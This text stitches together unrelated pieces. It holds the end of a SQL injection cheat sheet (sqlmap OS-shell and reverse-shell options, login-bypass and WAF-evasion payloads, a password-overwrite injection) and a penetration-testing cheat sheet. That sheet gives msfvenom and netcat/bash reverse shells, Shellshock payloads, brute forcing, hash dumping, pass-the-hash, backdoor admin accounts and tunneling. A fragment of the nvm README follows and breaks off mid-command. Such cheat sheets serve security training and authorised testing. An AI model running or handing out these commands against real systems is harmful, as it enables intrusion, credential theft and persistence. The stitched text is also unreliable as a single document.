"MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ``` ## SQL injection using SQLmap ### Basic arguments for SQLmap ```powershell sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs ``` ### Load a request file and use mobile user-agent ```powershell sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1 ``` ### Custom injection in UserAgent/Header/Referer/Cookie ```powershell python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*" The injection is located at the '*' ``` ### Second order injection ```powershell python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs ``` ### Shell ```powershell SQL Shell python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell Simple Shell python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn SSH Shell by dropping an SSH key python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/ ``` ### Crawl a website with SQLmap and auto-exploit ```powershell sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms ``` ### Using TOR with SQLmap ```powershell sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5 ``` ### Using a proxy with SQLmap ```powershell sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080" ``` ### Using Chrome cookie and a Proxy ```powershell sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3 ``` ### Using suffix to tamper the injection ```powershell python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` ### General tamper option and tamper's list ```powershell tamper=name_of_the_tamper ``` | Tamper | Description | | --- | --- | |0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart | |apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | |apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart| |appendnullbyte.py | Appends encoded NULL byte character at the end of payload | |base64encode.py | Base64 all characters in a given payload | |between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | |bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | |chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | |charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) | |charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) | |charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) | |commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'| |commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'| |commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() | |concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'| |charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | |charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | |equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' | |escapequotes.py | Slash escape quotes (' and ") | |greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | |halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | |htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> &#39;) | |ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart| |ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'| |informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier | |least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart | |lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) | |modsecurityversioned.py | Embraces complete query with versioned comment | |modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | |multiplespaces.py | Adds multiple spaces around SQL keywords | |nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters| |overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | |overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) | |percentage.py | Adds a percentage sign ('%') infront of each character | |plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart | |plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart | |randomcase.py | Replaces each keyword character with random case value | |randomcomments.py | Add random comments to SQL keywords| |securesphere.py | Appends special crafted string | |sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | |space2comment.py | Replaces space character (' ') with comments | |space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | |space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | |space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | |space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | |space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | |space2plus.py | Replaces space character (' ') with plus ('+') | |space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | |symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | |unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | |unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | |uppercase.py | Replaces each keyword character with upper case value 'INSERT'| |varnish.py | Append a HTTP header 'X-originating-IP' | |versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | |versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| ## Authentication bypass ```sql '-' ' ' '&' '^' '*' ' or 1=1 limit 1 -- -+ '="or' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' '-||0' "-||0" "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 2 like 2 or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' -- - admin' # admin'/* admin' or '2' LIKE '1 admin' or 2 LIKE 2-- admin' or 2 LIKE 2# admin') or 2 LIKE 2# admin') or 2 LIKE 2-- admin') or ('2' LIKE '2 admin') or ('2' LIKE '2'# admin') or ('2' LIKE '2'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` ## Authentication Bypass (Raw MD5) When a raw md5 is used, the pass will be queried as a simple string, not a hexstring. ```php "SELECT * FROM admin WHERE pass = '".md5($password,true)."'" ``` Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING` ```php md5("ffifdyop", true) = 'or'6�]��!r,��b ``` Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772) ## Polyglot injection (multicontext) ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ ``` ## Routed injection ```sql admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' ``` ## Insert Statement - ON DUPLICATE KEY UPDATE ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by: ```sql Inject using payload: [email protected]", "bcrypt_hash_of_qwerty"), ("[email protected]", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- The query would look like this: INSERT INTO users (email, password) VALUES ("[email protected]", "bcrypt_hash_of_qwerty"), ("[email protected]", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input"); This query will insert a row for the user “[email protected]”. It will also insert a row for the user “[email protected]”. Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty". After this, we can simply authenticate with “[email protected]” and the password “qwerty”! ``` ## WAF Bypass No Space (%20) - bypass using whitespace alternatives ```sql ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- ?id=1%0Cand%0C1=1%0C-- ?id=1%0Band%0B1=1%0B-- ?id=1%0Aand%0A1=1%0A-- ?id=1%A0and%A01=1%A0-- ``` No Whitespace - bypass using comments ```sql ?id=1/*comment*/and/**/1=1/**/-- ``` No Whitespace - bypass using parenthesis ```sql ?id=(1)and(1)=(1)-- ``` No Comma - bypass using OFFSET, FROM and JOIN ```sql LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` No Equal - bypass using LIKE/NOT IN/IN ```sql ?id=1 and substring(version(),1,1)like(5) ?id=1 and substring(version(),1,1)not in(4,3) ?id=1 and substring(version(),1,1)in(4,3) ``` Blacklist using keywords - bypass using uppercase/lowercase ```sql ?id=1 AND 1=1# ?id=1 AnD 1=1# ?id=1 aNd 1=1# ``` Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || = -> LIKE,REGEXP, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` Information_schema.tables Alternative ```sql select * from mysql.innodb_table_stats; +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes | +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | dvwa | guestbook | 2017-01-19 21:02:57 | 0 | 1 | 0 | | dvwa | users | 2017-01-19 21:03:07 | 5 | 1 | 0 | ... +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ mysql> show tables in dvwa; +----------------+ | Tables_in_dvwa | +----------------+ | guestbook | | users | +----------------+ ``` Version Alternative ```sql mysql> select @@innodb_version; +------------------+ | @@innodb_version | +------------------+ | 5.6.31 | +------------------+ mysql> select @@version; +-------------------------+ | @@version | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ mysql> mysql> select version(); +-------------------------+ | version() | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ ``` ## References * Detect SQLi * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) * [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/) * MySQL: * [PentestMonkey's mySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) * [Reiners mySQL injection Filter Evasion Cheatsheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) * [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/) * [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection) * MSSQL: * [EvilSQL's Error/Union/Blind MSSQL Cheatsheet](http://evilsql.com/main/page2.php) * [PentestMonkey's MSSQL SQLi injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * ORACLE: * [PentestMonkey's Oracle SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet) * POSTGRESQL: * [PentestMonkey's Postgres SQLi Cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) * Others * [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) * [Access SQLi Cheatsheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) * [PentestMonkey's Ingres SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet) * [Pentestmonkey's DB2 SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet) * [Pentestmonkey's Informix SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet) * [SQLite3 Injection Cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet) * [Ruby on Rails (Active Record) SQL Injection Guide](http://rails-sqli.org/) * [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html) * [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) * [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) * Second Order: * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/) * [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) * Sqlmap: * [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
Infrastructure help ======= * [Infrastructure help](#infrastructure-help) * [Enumeration](#enumeration) * [Arp Scan](#arp-scan) * [Ping Sweep](#ping-sweep) * [Port Scan](#port-scan) * [Web](#web) * [SMB](#smb) * [SNMP](#snmp) * [NSE scripts](#nse-scripts) * [Exploitation](#exploitation) * [Compiling exploits](#compiling-exploits) * [Binaries/shellcode](#binariesshellcode) * [SQL Injection](#sql-injection) * [Shellshock](#shellshock) * [Password attacks](#password-attacks) * [Bruteforce or dictionary](#bruteforce-or-dictionary) * [Password / hash dump](#password--hash-dump) * [Pass the hash](#pass-the-hash) * [Post Exploitation](#post-exploitation) * [Reverse shells](#reverse-shells) * [File transfer](#file-transfer) * [Add User](#add-user) * [Privilege Escalation](#privilege-escalation) * [Windows](#windows) * [Linux](#linux) * [Tunneling](#tunneling) * [Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET )](#remote-port-forward-host-a---kali-host-b---compromised-host-c---target-) * [Proxychains](#proxychains) * [Local SSH Port Forward](#local-ssh-port-forward) ## Enumeration ### Arp Scan ```bash netdiscover -i eth1 -r <network> arp -a -i eth1 ``` ### Ping Sweep Bash ```bash for ip in $(seq 1 254); do ping -c 1 192.168.0.$ip | grep "bytes from" | cut -d" " -f4 |cut -d":" -f1 ; done ``` TODO Windows/PS, Python ### Port Scan TCP ```bash nmap -v -sS -sV -Pn -n -p- <host> ``` UDP ```bash nmap -v -sU -Pn -n --top-ports=25 <host> ``` Netcat traditional ```bash nc -v -n -z -w1 <host> 1-10000 ``` Netcat OpenBSD ```bash nc -v -n -z -w1 <host>> 1-10000 2>&1 |grep succeed ``` ### Web Looking for common vulns ```bash nmap -sV -Pn -v -p <ports> --script http-vuln* <host> ``` Dirbusting ```bash dirb http://<host>/ /usr/share/dirb/wordlists/big.txt -S -r -w ``` ### SMB ```bash enum4linux -v -a <host> ``` ```bash nmap -sV -Pn -vv -p <ports> --script=smb-check-vulns,smb-psexec,smb-vuln-ms10-054,smb-vuln-ms10-061 --script-args=unsafe=1 <host> ``` ### SNMP ```bash snmpcheck -t <host> ``` ### NSE scripts ```bash ls /usr/share/nmap/scripts/ -l | grep ``` * smb* * http* ### tcpdump ```bash sudo tcpdump -i eth0 -nq -s0 -C100 -w audit_`date +"%Y%m%d_%H%M%S"`.pcap ``` ## Exploitation ### Compiling exploits Compiling on Windows ```bash gcc -m32 -ggdb -o <output> -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack <input>.c ``` Compiling on Linux ```bash gcc <input>.c -o <output> -lssl -lcrypt ``` Compiling Windows flavored C on Linux (note missing libraries) ```bash i586-mingw32msvc-gcc <input>.c -o <output>.exe -lwsock32 -lrpcrt4 -lmpr -lws2_32 ``` ### Binaries/shellcode Msfvenom ```bash msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winreverseshell.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winrmeterpretershell.exe ``` Metasploit Listener ``` use exploit/multi/handler set PAYLOAD <payload> set LHOST <lhost> set LPORT <lport> set ExitOnSession false exploit -j -z ``` Meterpreter reminders ``` msfdb init show options advanced set ExitOnSession false set AutoRunScript persistence ``` ### SQL Injection ```bash sqlmap -u "http://<host>/index.php" --data="username=admin&password=admin&Submit=Login+In" --level=5 --risk=3 --time-sec 10 --dbms=mysql --os-shell ``` ### Shellshock ```bash curl -A '() { :;}; echo -en "\r\n\r\n$(echo;/usr/bin/id)\r\n\r\n"' <host>:<port>/cgi-bin/vuln.cgi curl -i -X OPTIONS -H "User-Agent: () { :;};echo;/usr/bin/id" "http://<host>:<port>/cgi-bin/vuln.cgi" ssh noob@<host> '() { :;}; uname -a' ``` ## Password attacks ### Bruteforce or dictionary LM ```bash rcracki_mt -h <hash> <rainbow> ``` Hydra ```bash hydra -V -u -o found-ftp.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 21 <host> ftp hydra -V -u -o found-ssh.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 22 <host> ssh hydra -V -u -o found-telnet.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 23 <host> telnet hydra -V -u -o found-snmp.txt -e nsr -P wordlists/snmp.txt <host> snmp ``` John ```bash john --rules --wordlist=/usr/share/wordlists/rockyou.txt --format=<format from hashid> <hash file> ``` Unshadow ```bash unshadow /etc/passwd /etc/shadow > unshadowed ``` Hash id (https://github.com/psypanda/hashID) ```bash hashid.py -j <hash> ``` ### Password / hash dump ``` wce -w PwDump7.exe ``` ### Pass the hash ``` pth-winexe -U bob%254095eef2e2be31f7a83d6fb4b9887b:0d3f32016ee8a42ba768d558875d57e5 //<host> cmd ``` ## Post Exploitation ### Reverse shells Netcat ``` nc -nv <host> <port> -e /bin/bash nc -nv <host> <port> -e cmd.exe ``` Bash ``` /bin/bash -i >& /dev/tcp/<host>/<port> 0>&1 ``` Improve Linux feedback on shell ``` python -c 'import pty; pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i ``` ### File transfer FTP ``` echo open <host> > ftp.txt echo <user> >> ftp.txt echo <pass> >> ftp.txt echo bin >> ftp.txt echo get nc.exe >> ftp.txt echo bye >> ftp.txt ftp -s:ftp.txt ``` Powershell ``` echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >> wget.ps1 echo $url = "http://<host>/accesschk.exe" >> wget.ps1 echo $file = "accesschk.exe" >> wget.ps1 echo $webclient.DownloadFile($url,$file) >> wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 ``` ### Add User Windows ``` net user hacker MNB00zxc /add net localgroup administrators hacker /add ``` Linux ``` /usr/sbin/useradd -g 0 -m -o -u 0 hacker echo "hacker:123456qwe" | /usr/sbin/chpasswd ``` ## Privilege Escalation ### Windows Find misconfigured services ```bash accesschk.exe /accepteula -uwcqv "Authenticated Users" * ``` Find all weak folder permissions per drive. ```bash accesschk.exe /accepteula -uwdqs Users c:\ accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ ``` Find all weak file permissions per drive. ```bash accesschk.exe /accepteula -uwqs Users c:\*.* accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* ``` ### Linux Find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) ```bash find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null ``` Find passwords in files ```bash grep -i -r "password" /**/*.php 2>/dev/null find . -name "*.php" -print0 | xargs -0 grep -i -n "password" 2>/dev/null ``` Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here ``` find / -perm -1000 -type d 2>/dev/null ``` SGID (chmod 2000) - run as the group, not the user who started it ``` find / -perm -g=s -type f 2>/dev/null ``` SUID (chmod 4000) - run as the owner, not the user who started it ``` find / -perm -u=s -type f 2>/dev/null ``` SGID or SUID ``` find / -perm -g=s -o -perm -u=s -type f 2>/dev/null ``` Sudo list permissions ```bash sudo -l ``` ## Tunneling ### Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET ) ``` COMPROMISED > plink.exe KALI -P 22 -l root -pw rootpass -C -R 3389:TARGET:3389 ``` ### Proxychains ``` ssh -D <local_port> -p <ssh_listening_port> hacker@COMPROMISED proxychains ``` ### Local SSH Port Forward ``` ssh -L <local_port>:<target_host>:<target_host_port> hacker@COMPROMISED ```
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.5-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684) <!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --> ## Table of Contents - [Installation](#installation) - [Install script](#install-script) - [Verify installation](#verify-installation) - [Important Notes](#important-notes) - [Git install](#git-install) - [Manual Install](#manual-install) - [Manual upgrade](#manual-upgrade) - [Usage](#usage) - [Long-term support](#long-term-support) - [Migrating global packages while installing](#migrating-global-packages-while-installing) - [Default global packages from file while installing](#default-global-packages-from-file-while-installing) - [io.js](#iojs) - [System version of node](#system-version-of-node) - [Listing versions](#listing-versions) - [.nvmrc](#nvmrc) - [Deeper Shell Integration](#deeper-shell-integration) - [zsh](#zsh) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file) - [License](#license) - [Running tests](#running-tests) - [Bash completion](#bash-completion) - [Usage](#usage-1) - [Compatibility Issues](#compatibility-issues) - [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux) - [Docker for development environment](#docker-for-development-environment) - [Problems](#problems) - [Mac OS "troubleshooting"](#mac-os-troubleshooting) <!-- END doctoc generated TOC please keep comment here to allow auto update --> ## Installation ### Install script To install or update nvm, you can use the [install script][2] using cURL: ```sh curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.5/install.sh | bash ``` or Wget: ```sh wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.33.5/install.sh | bash ``` <sub>The script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).</sub> ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm ``` You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables. Eg: `curl ... | NVM_DIR=/usr/local/nvm bash` for a global install. <sub>*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*</sub> **Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type: ```sh command -v nvm ``` simply close your current terminal, open a new terminal, and try verifying again. **Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:- - your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again - you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry. If the above doesn't fix the problem, open your `.bash_profile` and add the following line of code: `source ~/.bashrc` - For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576) ### Verify installation To verify that nvm has been installed, do: ```sh command -v nvm ``` which should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary. ### Important Notes If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work. **Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us: - [nvm-windows](https://github.com/coreybutler/nvm-windows) - [nodist](https://github.com/marcelklehr/nodist) **Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us: - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish **Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket: - [[#900] [Bug] nodejs on FreeBSD may need to be patched ](https://github.com/creationix/nvm/issues/900) - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716) **Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that: - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/) **Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that: - When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt` - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm) - You can (but should not?) keep your previous "system" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*` Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue. **Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade. **Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, so the minimum required git version is v1.7.0 and we recommend v1.7.9.5 as it's the default version of the widely used Ubuntu 12.04 LTS. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article. ### Git install If you have `git` installed (requires git v1.7+): 1. clone this repo in the root of your user profile - `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm` 1. check out the latest version with `git checkout v0.33.5` 1. activate nvm by sourcing it from your shell Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Install For a fully manual install, create a folder somewhere in your filesystem with the `nvm.sh` file inside it. I put mine in `~/.nvm` and added the following to the `nvm.sh` file. ```sh export NVM_DIR="$HOME/.nvm" && ( git clone https://github.com/creationix/nvm.git "$NVM_DIR" cd "$NVM_DIR" git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin` ) && . 